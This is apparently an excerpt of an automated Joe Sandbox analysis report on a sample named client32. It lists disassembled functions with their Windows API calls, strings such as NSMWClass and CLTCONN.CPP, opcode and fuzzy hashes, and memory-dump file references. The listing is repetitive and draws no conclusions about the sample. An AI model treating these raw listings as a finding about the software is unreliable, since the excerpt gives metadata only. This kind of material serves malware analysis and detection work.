Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$VisibleWindow
String ID: %d,%d,%d,%d,%d,%d
API String ID: 1671172596-1913222166
Opcode ID: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
Instruction ID: 343a7c5902a362ececb8f7ca127abed5b4c5d2d50e5eb0de1d2da9fabf51934b
Opcode Fuzzy Hash: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
Instruction Fuzzy Hash: 17519C74B00215AFD710CB68CC80FAAB7F9AF88704F508698E6599B281CB70ED45CBA1

Function 685A0DC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

std::exception::exception.LIBCMT ref: 685A0EEB
__CxxThrowException@8.LIBCMT ref: 685A0F00

Strings

0f]h, xrefs: 685A0EF5, 685A0EF8
PIN, xrefs: 685A0E44

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: 0f]h$PIN
API String ID: 1338273076-3806878828
Opcode ID: 446f466d8c433402f09cf39f2b9662d4cfc65eecf081cfbca28036be0520b431
Instruction ID: 45494024bb7867e78a988d09fd7cfb8004f9f5ab1d3f059bc36bb13d9efef99d
Opcode Fuzzy Hash: 446f466d8c433402f09cf39f2b9662d4cfc65eecf081cfbca28036be0520b431
Instruction Fuzzy Hash: DC411AB5D00248AFDF40DFE8D8809EEBBB5FB49314F90452EE82AAB240E7355A44CB51

Function 685979C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 68597AA4
_free.LIBCMT ref: 68597AB0

Strings

a3Zh, xrefs: 685979C9
DATA, xrefs: 685979FC

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: DATA$a3Zh
API String ID: 269201875-18189924
Opcode ID: 4a4c2b1570c556f6a3c70ef61a71d1a1fedd2c538428b3331bab13621986c37b
Instruction ID: 7191b5f6d7004659755abcc9f3dd958e82d5dfec587540a4aff1bb519174af18
Opcode Fuzzy Hash: 4a4c2b1570c556f6a3c70ef61a71d1a1fedd2c538428b3331bab13621986c37b
Instruction Fuzzy Hash: 3C31C1B5D00249ABDB01CFA88C41BBF77F99F84224F844169E829E7200FB349F4587E6

Function 68596CAD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68596D0A
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68596D72

Strings

InternetQueryDataAvailable, xrefs: 68596D04
InternetReadFile, xrefs: 68596D6C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: InternetQueryDataAvailable$InternetReadFile
API String ID: 190572456-1434219782
Opcode ID: 0de84fd5cfabcaf65b75a9b3a1955609caa3ce294a12053ada02aed7332bcc88
Instruction ID: af023c81277b3062dffda0f7edad90cbb74ec68688eb967c73d4b99bdf3c7005
Opcode Fuzzy Hash: 0de84fd5cfabcaf65b75a9b3a1955609caa3ce294a12053ada02aed7332bcc88
Instruction Fuzzy Hash: 103114769002A99FDF21DF68CCD0AD9B7F8EF59304B5148E9EA98D7200D270A9C9CF50

Function 685A7970 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79networkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,?,00000000), ref: 685A79F1
WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 685A7A16

Strings

hbuf->data, xrefs: 685A79CD
httputil.c, xrefs: 685A79C8

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: hbuf->data$httputil.c
API String ID: 1452528299-2732665889
Opcode ID: 68eeef271c13f91a11cd490788b14e3e652c06f812793a568613f29565b02d05
Instruction ID: c89c1fab6a6fde405766de50f3342970425994b1f305379af91505ee79badcdd
Opcode Fuzzy Hash: 68eeef271c13f91a11cd490788b14e3e652c06f812793a568613f29565b02d05
Instruction Fuzzy Hash: DB21447A600B019FD320CE29DC80E6BB7F6EFD5655B54C82ED8EA97645D731F8018B50

Function 11039390 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 110393B2

Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804

_strtok.LIBCMT ref: 11039433

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

; >, xrefs: 110393A9, 1103942C
CLTCONN.CPP, xrefs: 110393E7

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
String ID: ; >$CLTCONN.CPP
API String ID: 3120919156-788487980
Opcode ID: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
Instruction ID: 48fd02c5cc66f23834ff9d805c81fd3cb0a4cfabe792bc6ab9c015f56f8a8e7f
Opcode Fuzzy Hash: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
Instruction Fuzzy Hash: 4821E775F1425B6BD701CEA58C40F9AB6D49F85359F0440A5FE08DB380FAB4AD0183D2

Function 11031170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(7E4636A2,00000000,?,7E4636A2,1118736B,000000FF,?,11066188,NSMWClass,7E4636A2,?,1106DC18), ref: 110311AA
__strdup.LIBCMT ref: 110311F5

Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,7E4636A2,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154

Strings

NSMWClass, xrefs: 110311BF
NSMWClassVista, xrefs: 110311EF, 110311F4, 11031218

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
String ID: NSMWClass$NSMWClassVista
API String ID: 319803333-889775840
Opcode ID: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
Opcode Fuzzy Hash: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750

Function 68596CE7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68596D0A
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68596D72

Strings

InternetQueryDataAvailable, xrefs: 68596D04
InternetReadFile, xrefs: 68596D6C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: InternetQueryDataAvailable$InternetReadFile
API String ID: 190572456-1434219782
Opcode ID: 2c204253761722dbc7d7418de179a381cdd13a73f75c27788b8c3b00b1a839d6
Instruction ID: a5e8f972b3dcce074a48537eb0a5cac376a6e3a6f5b35571efd7441ef002afaf
Opcode Fuzzy Hash: 2c204253761722dbc7d7418de179a381cdd13a73f75c27788b8c3b00b1a839d6
Instruction Fuzzy Hash: 90214C759042A99FDF21DF54C890AE8B7F8FB48305F5144EAEAA9D7200D6705DC88F90

Function 68596BD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 68596C0F
SetLastError.KERNEL32(00000078), ref: 68596C2E

Strings

InternetQueryOptionA, xrefs: 68596C09
*, xrefs: 68596C34

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: *$InternetQueryOptionA
API String ID: 199729137-4161725205
Opcode ID: 20a399b860fb95d9bb7e1a4507e6a98136521fc49d136941037c38584fe4634b
Instruction ID: 6c96144005bc7611b292c73416fcdca039c59d0aabfe828e2466442f1266e960
Opcode Fuzzy Hash: 20a399b860fb95d9bb7e1a4507e6a98136521fc49d136941037c38584fe4634b
Instruction Fuzzy Hash: 9B212C71900248DFCF51EF68D840AAEBBF4FB49311F51815AED56A7280D774AA44CFD4

Function 11063300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11063340
_strtok.LIBCMT ref: 11063370
_strtok.LIBCMT ref: 11063388

Strings

,= , xrefs: 1106333A, 11063369, 11063381

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok
String ID: ,=
API String ID: 1675499619-2677018336
Opcode ID: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
Instruction ID: feda1c23a4deb0c6415e8fc3f525424d3758ff44d9e037eb8c71fca6166ea7b8
Opcode Fuzzy Hash: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
Instruction Fuzzy Hash: 7111C266E0866B1FEB41CE699C11BCBB7D85F06259F04C0D5F95C9B341EA20F801C6E2

Function 1114F010 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1114F04C
_memmove.LIBCMT ref: 1114F086

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\WCUNPACK.C, xrefs: 1114F061
n > 128, xrefs: 1114F066

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$ErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\WCUNPACK.C$n > 128
API String ID: 6605023-1396654219
Opcode ID: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
Instruction ID: df32f2f24868e4b0a831f81203bc5965ced63257c83ed47365b8bb2cf1ea103c
Opcode Fuzzy Hash: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
Instruction Fuzzy Hash: 37112976C0116677C3118E2D9D88E8BFF69EB81A68F248125FC9817741F731A61087E2

Function 685A0B84 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 685A0BA3

Part of subcall function 685B400A: std::exception::_Copy_str.LIBCMT ref: 685B4025

__CxxThrowException@8.LIBCMT ref: 685A0B94

Part of subcall function 685B42DF: RaiseException.KERNEL32(?,?,6859439C,?,?,?,?,?,6859439C,?,685D6630,?,00000000), ref: 685B4321

__CxxThrowException@8.LIBCMT ref: 685A0BB8

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

std::exception::exception.LIBCMT ref: 685A0C17
__CxxThrowException@8.LIBCMT ref: 685A0C2C

Strings

0f]h, xrefs: 685A0BAD, 685A0BB0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_malloc_memsetstd::exception::_wsprintf
String ID: 0f]h
API String ID: 1502670295-3511245404
Opcode ID: 7346744ed0bc83131fbe808a0fe3c5342ffe2bb87e652117084eec5973fff17c
Instruction ID: 6b726e34dff55e0df6466e5311ff20041e31d35ec4128e82320a87a27a0ed636
Opcode Fuzzy Hash: 7346744ed0bc83131fbe808a0fe3c5342ffe2bb87e652117084eec5973fff17c
Instruction Fuzzy Hash: 291112B59002189BCB24DF99D8519AFFBF8EFE4204B50891EE95597200E7759904CFA1

Function 68598B50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68598B68
wsprintfA.USER32 ref: 68598B87

Strings

Gateway_Name, xrefs: 68598B7D
%s_%d, xrefs: 68598B81

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memsetwsprintf
String ID: %s_%d$Gateway_Name
API String ID: 1984265443-207007254
Opcode ID: 13079522d3d795d6b6cf418622cdba9acfe6fba55187ed9bb4c3510b0ee3c3a1
Instruction ID: 4f4434e9e3fe9afe2b3cedd2fd6796d7aff20a0c9328d683038c16c0fcf2c37a
Opcode Fuzzy Hash: 13079522d3d795d6b6cf418622cdba9acfe6fba55187ed9bb4c3510b0ee3c3a1
Instruction Fuzzy Hash: FB01F2B5A40248EFDB10DB68DC51FBE77B8EB86604F804484FD169B245E631AE14C7AA

Function 11015020 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11015033, 110A9E03
..\ctl32\liststat.cpp, xrefs: 1101502E
..\ctl32\listview.cpp, xrefs: 110A9DFE

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
